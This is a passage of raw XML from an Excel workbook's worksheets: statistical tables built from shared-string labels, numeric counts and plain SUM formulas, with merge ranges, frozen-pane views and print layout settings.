        <v>154</v>
      </c>
      <c r="K17" s="23"/>
      <c r="L17" s="23"/>
      <c r="M17" s="23">
        <v>2</v>
      </c>
      <c r="N17" s="23">
        <v>431</v>
      </c>
      <c r="O17" s="98">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="P17" s="98">
        <f t="shared" si="5"/>
        <v>431</v>
      </c>
    </row>
    <row r="18" spans="1:16" ht="18.75" customHeight="1">
      <c r="A18" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B18" s="114">
        <f t="shared" si="1"/>
        <v>1129</v>
      </c>
      <c r="C18" s="114">
        <f t="shared" si="2"/>
        <v>981</v>
      </c>
      <c r="D18" s="114">
        <f t="shared" si="3"/>
        <v>148</v>
      </c>
      <c r="E18" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="F18" s="23"/>
      <c r="G18" s="23"/>
      <c r="H18" s="113">
        <v>1129</v>
      </c>
      <c r="I18" s="23">
        <v>981</v>
      </c>
      <c r="J18" s="23">
        <v>148</v>
      </c>
      <c r="K18" s="23">
        <v>0</v>
      </c>
      <c r="L18" s="23">
        <v>0</v>
      </c>
      <c r="M18" s="23">
        <v>18</v>
      </c>
      <c r="N18" s="23">
        <v>1129</v>
      </c>
      <c r="O18" s="98">
        <v>18</v>
      </c>
      <c r="P18" s="98">
        <v>1129</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="21">
    <mergeCell ref="M5:N5"/>
    <mergeCell ref="O5:P5"/>
    <mergeCell ref="C5:C6"/>
    <mergeCell ref="E5:E6"/>
    <mergeCell ref="D5:D6"/>
    <mergeCell ref="F5:F6"/>
    <mergeCell ref="K5:L5"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="H5:H6"/>
    <mergeCell ref="G5:G6"/>
    <mergeCell ref="I5:I6"/>
    <mergeCell ref="J5:J6"/>
    <mergeCell ref="A1:E1"/>
    <mergeCell ref="A3:A6"/>
    <mergeCell ref="N2:P2"/>
    <mergeCell ref="B3:J3"/>
    <mergeCell ref="K3:P3"/>
    <mergeCell ref="K4:P4"/>
    <mergeCell ref="B4:D4"/>
    <mergeCell ref="E4:G4"/>
    <mergeCell ref="H4:J4"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.9448818897637796" right="0.5511811023622047" top="0.5118110236220472" bottom="0.5511811023622047" header="0.5118110236220472" footer="0.5118110236220472"/>
  <pageSetup horizontalDpi="300" verticalDpi="3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pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="C5" sqref="C5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="8.125" style="0" customWidth="1"/>
    <col min="2" max="2" width="10.50390625" style="0" customWidth="1"/>
    <col min="3" max="12" width="10.125" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="14.25">
      <c r="A1" t="s">
        <v>401</v>
      </c>
    </row>
    <row r="2" spans="1:12" ht="14.25">
      <c r="A2" s="15"/>
      <c r="B2" s="15"/>
      <c r="C2" s="15"/>
      <c r="D2" s="15"/>
      <c r="E2" s="15"/>
      <c r="F2" s="15"/>
      <c r="G2" s="15"/>
      <c r="H2" s="15"/>
      <c r="I2" s="15"/>
      <c r="J2" s="158" t="s">
        <v>324</v>
      </c>
      <c r="K2" s="158"/>
      <c r="L2" s="158"/>
    </row>
    <row r="3" spans="1:12" ht="21" customHeight="1">
      <c r="A3" s="49" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="50" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="50" t="s">
        <v>61</v>
      </c>
      <c r="D3" s="51" t="s">
        <v>62</v>
      </c>
      <c r="E3" s="51" t="s">
        <v>58</v>
      </c>
      <c r="F3" s="51" t="s">
        <v>49</v>
      </c>
      <c r="G3" s="50" t="s">
        <v>63</v>
      </c>
      <c r="H3" s="50" t="s">
        <v>52</v>
      </c>
      <c r="I3" s="50" t="s">
        <v>64</v>
      </c>
      <c r="J3" s="50" t="s">
        <v>65</v>
      </c>
      <c r="K3" s="50" t="s">
        <v>66</v>
      </c>
      <c r="L3" s="50" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="16.5" customHeight="1">
      <c r="A4" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="53">
        <f>SUM(C4:L4)</f>
        <v>0</v>
      </c>
      <c r="C4" s="53">
        <f aca="true" t="shared" si="0" ref="C4:L4">SUM(C5:C15)</f>
        <v>0</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="16.5" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="113">
        <f aca="true" t="shared" si="1" ref="B5:B15">SUM(C5:L5)</f>
        <v>0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6.5" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="113">
        <f t="shared" si="1"/>
        <v>0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6.5" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="113">
        <f>SUM(C8:L8)</f>
        <v>0</v>
      </c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6.5" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="113">
        <f t="shared" si="1"/>
        <v>0</v>
      </c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6.5" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="113">
        <f t="shared" si="1"/>
        <v>0</v>
      </c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16.5" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="113">
        <f t="shared" si="1"/>
        <v>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6.5" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="113">
        <f t="shared" si="1"/>
        <v>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6.5" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="113">
        <f t="shared" si="1"/>
        <v>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6.5" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="113">
        <f t="shared" si="1"/>
        <v>0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6.5" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="113">
        <f t="shared" si="1"/>
        <v>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6.5" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="113">
        <f t="shared" si="1"/>
        <v>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</row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="J2:L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pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="7.50390625" style="0" customWidth="1"/>
    <col min="2" max="12" width="9.25390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="14.25">
      <c r="A1" s="191" t="s">
        <v>402</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162"/>
      <c r="E1" s="15"/>
      <c r="F1" s="15"/>
      <c r="G1" s="15"/>
      <c r="H1" s="15"/>
      <c r="I1" s="15"/>
      <c r="J1" s="15"/>
      <c r="K1" s="15"/>
      <c r="L1" s="15"/>
    </row>
    <row r="2" spans="1:12" ht="14.25">
      <c r="A2" s="15"/>
      <c r="B2" s="15"/>
      <c r="C2" s="15"/>
      <c r="D2" s="15"/>
      <c r="E2" s="15"/>
      <c r="F2" s="15"/>
      <c r="G2" s="15"/>
      <c r="H2" s="15"/>
      <c r="I2" s="15"/>
      <c r="J2" s="158" t="s">
        <v>325</v>
      </c>
      <c r="K2" s="158"/>
      <c r="L2" s="158"/>
    </row>
    <row r="3" spans="1:12" ht="21" customHeight="1">
      <c r="A3" s="49" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="50" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="50" t="s">
        <v>61</v>
      </c>
      <c r="D3" s="51" t="s">
        <v>62</v>
      </c>
      <c r="E3" s="51" t="s">
        <v>58</v>
      </c>
      <c r="F3" s="51" t="s">
        <v>49</v>
      </c>
      <c r="G3" s="50" t="s">
        <v>63</v>
      </c>
      <c r="H3" s="50" t="s">
        <v>52</v>
      </c>
      <c r="I3" s="50" t="s">
        <v>64</v>
      </c>
      <c r="J3" s="50" t="s">
        <v>65</v>
      </c>
      <c r="K3" s="50" t="s">
        <v>66</v>
      </c>
      <c r="L3" s="50" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="16.5" customHeight="1">
      <c r="A4" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="53">
        <f aca="true" t="shared" si="0" ref="B4:L4">SUM(B5:B15)</f>
        <v>0</v>
      </c>
      <c r="C4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L4" s="61">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="16.5" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="82">
        <f>SUM(C5:L5)</f>
        <v>0</v>
      </c>
      <c r="C5" s="23"/>
      <c r="D5" s="23"/>
      <c r="E5" s="23"/>
      <c r="F5" s="23"/>
      <c r="G5" s="23"/>
      <c r="H5" s="23"/>
      <c r="I5" s="23"/>
      <c r="J5" s="23"/>
      <c r="K5" s="23"/>
      <c r="L5" s="27"/>
    </row>
    <row r="6" spans="1:12" ht="16.5" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="82">
        <f aca="true" t="shared" si="1" ref="B6:B15">SUM(C6:L6)</f>
        <v>0</v>
      </c>
      <c r="C6" s="23"/>
      <c r="D6" s="23"/>
      <c r="E6" s="23"/>
      <c r="F6" s="23"/>
      <c r="G6" s="23"/>
      <c r="H6" s="23"/>
      <c r="I6" s="23"/>
      <c r="J6" s="23"/>
      <c r="K6" s="23"/>
      <c r="L6" s="27"/>
    </row>
    <row r="7" spans="1:12" ht="16.5" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C7" s="23"/>
      <c r="D7" s="23"/>
      <c r="E7" s="23"/>
      <c r="F7" s="23"/>
      <c r="G7" s="23"/>
      <c r="H7" s="23"/>
      <c r="I7" s="23"/>
      <c r="J7" s="23"/>
      <c r="K7" s="23"/>
      <c r="L7" s="28"/>
    </row>
    <row r="8" spans="1:12" ht="16.5" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C8" s="23"/>
      <c r="D8" s="23"/>
      <c r="E8" s="23"/>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="23"/>
      <c r="L8" s="28"/>
    </row>
    <row r="9" spans="1:12" ht="16.5" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="23"/>
      <c r="D9" s="23"/>
      <c r="E9" s="23"/>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="23"/>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="23"/>
      <c r="L9" s="28"/>
    </row>
    <row r="10" spans="1:12" ht="16.5" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C10" s="23"/>
      <c r="D10" s="23"/>
      <c r="E10" s="23"/>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="23"/>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="23"/>
      <c r="L10" s="28"/>
    </row>
    <row r="11" spans="1:12" ht="16.5" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C11" s="23"/>
      <c r="D11" s="23"/>
      <c r="E11" s="23"/>
      <c r="F11" s="23"/>
      <c r="G11" s="23"/>
      <c r="H11" s="23"/>
      <c r="I11" s="23"/>
      <c r="J11" s="23"/>
      <c r="K11" s="23"/>
      <c r="L11" s="28"/>
    </row>
    <row r="12" spans="1:12" ht="16.5" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C12" s="23"/>
      <c r="D12" s="23"/>
      <c r="E12" s="23"/>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="23"/>
      <c r="I12" s="23"/>
      <c r="J12" s="23"/>
      <c r="K12" s="23"/>
      <c r="L12" s="28"/>
    </row>
    <row r="13" spans="1:12" ht="16.5" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C13" s="23"/>
      <c r="D13" s="23"/>
      <c r="E13" s="23"/>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="23"/>
      <c r="I13" s="23"/>
      <c r="J13" s="23"/>
      <c r="K13" s="23"/>
      <c r="L13" s="28"/>
    </row>
    <row r="14" spans="1:12" ht="16.5" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C14" s="23"/>
      <c r="D14" s="23"/>
      <c r="E14" s="23"/>
      <c r="F14" s="23"/>
      <c r="G14" s="23"/>
      <c r="H14" s="23"/>
      <c r="I14" s="23"/>
      <c r="J14" s="23"/>
      <c r="K14" s="23"/>
      <c r="L14" s="28"/>
    </row>
    <row r="15" spans="1:12" ht="16.5" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="82">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C15" s="23"/>
      <c r="D15" s="23"/>
      <c r="E15" s="23"/>
      <c r="F15" s="23"/>
      <c r="G15" s="23"/>
      <c r="H15" s="23"/>
      <c r="I15" s="23"/>
      <c r="J15" s="23"/>
      <c r="K15" s="23"/>
      <c r="L15" s="28"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="2">
    <mergeCell ref="A1:D1"/>
    <mergeCell ref="J2:L2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567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pane ySplit="6" topLeftCell="A7" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="7.625" style="0" customWidth="1"/>
    <col min="2" max="3" width="8.875" style="0" customWidth="1"/>
    <col min="6" max="6" width="8.75390625" style="0" customWidth="1"/>
    <col min="7" max="7" width="8.875" style="0" customWidth="1"/>
    <col min="8" max="9" width="9.125" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:14" ht="14.25">
      <c r="A1" s="191" t="s">
        <v>403</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162"/>
      <c r="E1" s="162"/>
      <c r="F1" s="15"/>
      <c r="G1" s="15"/>
      <c r="H1" s="15"/>
      <c r="I1" s="15"/>
      <c r="J1" s="15"/>
      <c r="K1" s="15"/>
      <c r="L1" s="15"/>
      <c r="M1" s="15"/>
      <c r="N1" s="15"/>
    </row>
    <row r="2" spans="1:14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 t="s">
        <v>325</v>
      </c>
      <c r="M2" s="15"/>
      <c r="N2" s="15"/>
    </row>
    <row r="3" spans="1:14" ht="18.75" customHeight="1">
      <c r="A3" s="186" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="168" t="s">
        <v>84</v>
      </c>
      <c r="C3" s="168"/>
      <c r="D3" s="168"/>
      <c r="E3" s="168"/>
      <c r="F3" s="168"/>
      <c r="G3" s="168"/>
      <c r="H3" s="168"/>
      <c r="I3" s="168"/>
      <c r="J3" s="168"/>
      <c r="K3" s="165" t="s">
        <v>82</v>
      </c>
      <c r="L3" s="166"/>
      <c r="M3" s="167"/>
      <c r="N3" s="15"/>
    </row>
    <row r="4" spans="1:14" ht="19.5" customHeight="1">
      <c r="A4" s="187"/>
      <c r="B4" s="168" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="168"/>
      <c r="D4" s="168"/>
      <c r="E4" s="168" t="s">
        <v>59</v>
      </c>
      <c r="F4" s="168"/>
      <c r="G4" s="168"/>
      <c r="H4" s="168" t="s">
        <v>85</v>
      </c>
      <c r="I4" s="168"/>
      <c r="J4" s="168"/>
      <c r="K4" s="163" t="s">
        <v>244</v>
      </c>
      <c r="L4" s="192" t="s">
        <v>245</v>
      </c>
      <c r="M4" s="163" t="s">
        <v>10</v>
      </c>
      <c r="N4" s="15"/>
    </row>
    <row r="5" spans="1:14" ht="19.5" customHeight="1">
      <c r="A5" s="188"/>
      <c r="B5" s="50" t="s">
        <v>10</v>
      </c>
      <c r="C5" s="50" t="s">
        <v>12</v>
      </c>
      <c r="D5" s="50" t="s">
        <v>13</v>
      </c>
      <c r="E5" s="50" t="s">
        <v>10</v>
      </c>
      <c r="F5" s="50" t="s">
        <v>12</v>
      </c>
      <c r="G5" s="50" t="s">
        <v>13</v>
      </c>
      <c r="H5" s="50" t="s">
        <v>10</v>
      </c>
      <c r="I5" s="50" t="s">
        <v>12</v>
      </c>
      <c r="J5" s="50" t="s">
        <v>13</v>
      </c>
      <c r="K5" s="164"/>
      <c r="L5" s="193"/>
      <c r="M5" s="164"/>
      <c r="N5" s="15"/>
    </row>
    <row r="6" spans="1:14" ht="15.75" customHeight="1">
      <c r="A6" s="56" t="s">
        <v>10</v>
      </c>
      <c r="B6" s="53">
        <f aca="true" t="shared" si="0" ref="B6:M6">SUM(B7:B17)</f>
        <v>0</v>
      </c>
      <c r="C6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="D6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="M6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="N6" s="15"/>
    </row>
    <row r="7" spans="1:14" ht="15.75" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B7" s="114">
        <f>SUM(C7:D7)</f>
        <v>0</v>
      </c>
      <c r="C7" s="114">
        <f>SUM(F7,I7)</f>
        <v>0</v>
      </c>
      <c r="D7" s="114">
        <f>SUM(G7,J7)</f>
        <v>0</v>
      </c>
      <c r="E7" s="113">
        <f>SUM(F7:G7)</f>
        <v>0</v>
      </c>
      <c r="F7" s="23"/>
      <c r="G7" s="23"/>
      <c r="H7" s="113">
        <f>SUM(I7:J7)</f>
        <v>0</v>
      </c>
      <c r="I7" s="23"/>
      <c r="J7" s="23"/>
      <c r="K7" s="23"/>
      <c r="L7" s="23"/>
      <c r="M7" s="82">
        <f>SUM(K7:L7)</f>
        <v>0</v>
      </c>
      <c r="N7" s="15"/>
    </row>
    <row r="8" spans="1:14" ht="15.75" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B8" s="114">
        <f aca="true" t="shared" si="1" ref="B8:B17">SUM(C8:D8)</f>
        <v>0</v>
      </c>
      <c r="C8" s="114">
        <f aca="true" t="shared" si="2" ref="C8:C17">SUM(F8,I8)</f>
        <v>0</v>
      </c>
      <c r="D8" s="114">
        <f aca="true" t="shared" si="3" ref="D8:D17">SUM(G8,J8)</f>
        <v>0</v>
      </c>
      <c r="E8" s="113">
        <f aca="true" t="shared" si="4" ref="E8:E17">SUM(F8:G8)</f>
        <v>0</v>
      </c>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="113">
        <f aca="true" t="shared" si="5" ref="H8:H17">SUM(I8:J8)</f>
        <v>0</v>
      </c>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="23"/>
      <c r="L8" s="23"/>
      <c r="M8" s="82">
        <f aca="true" t="shared" si="6" ref="M8:M17">SUM(K8:L8)</f>
        <v>0</v>
      </c>
      <c r="N8" s="15"/>
    </row>
    <row r="9" spans="1:13" ht="15.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B9" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D9" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E9" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="23"/>
      <c r="L9" s="23"/>
      <c r="M9" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:13" ht="15.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B10" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C10" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D10" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E10" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
      <c r="M10" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:13" ht="15.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C11" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D11" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E11" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F11" s="23"/>
      <c r="G11" s="23"/>
      <c r="H11" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I11" s="23"/>
      <c r="J11" s="23"/>
      <c r="K11" s="23"/>
      <c r="L11" s="23"/>
      <c r="M11" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:13" ht="15.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C12" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D12" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E12" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I12" s="23"/>
      <c r="J12" s="23"/>
      <c r="K12" s="23"/>
      <c r="L12" s="23"/>
      <c r="M12" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:13" ht="15.75" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C13" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D13" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E13" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I13" s="23"/>
      <c r="J13" s="23"/>
      <c r="K13" s="23"/>
      <c r="L13" s="23"/>
      <c r="M13" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:13" ht="15.75" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C14" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D14" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E14" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F14" s="23"/>
      <c r="G14" s="23"/>
      <c r="H14" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I14" s="23"/>
      <c r="J14" s="23"/>
      <c r="K14" s="23"/>
      <c r="L14" s="23"/>
      <c r="M14" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:13" ht="15.75" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C15" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D15" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E15" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F15" s="23"/>
      <c r="G15" s="23"/>
      <c r="H15" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I15" s="23"/>
      <c r="J15" s="23"/>
      <c r="K15" s="23"/>
      <c r="L15" s="23"/>
      <c r="M15" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:13" ht="15.75" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C16" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D16" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E16" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F16" s="23"/>
      <c r="G16" s="23"/>
      <c r="H16" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I16" s="23"/>
      <c r="J16" s="23"/>
      <c r="K16" s="23"/>
      <c r="L16" s="23"/>
      <c r="M16" s="82">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:13" ht="15.75" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B17" s="114">
